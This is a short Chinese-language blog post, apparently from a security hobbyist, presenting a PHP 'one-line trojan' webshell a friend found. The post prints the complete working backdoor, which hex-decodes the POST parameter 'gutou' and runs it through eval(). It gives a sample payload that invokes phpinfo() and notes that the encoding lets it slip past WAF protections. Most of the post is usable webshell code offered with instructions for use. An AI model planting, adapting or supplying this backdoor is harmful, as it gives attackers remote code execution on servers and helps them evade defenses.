一个有趣的一句话木马 0x1 加密了通讯方式,使用了一个小特性。


朋友发现一个后门文件,让我看看如何使用。
使用了hex编码进行加密,这样完全可以过各种防护。如果防护加了规则,那就加点算法扰乱,感觉通过正则WAF时代要过去了。。。没什么卵用,太难防御了。

gutou=706870696E666F28293B   phpinfo()

<?php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
   $GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
   $cc="";for($i=0;$i<strlen($GuTou);$i+=2)
   $cc.=urldecode("%".substr($GuTou,$i,2));
   @eval($cc);exit;
}
?>

标签: none

添加新评论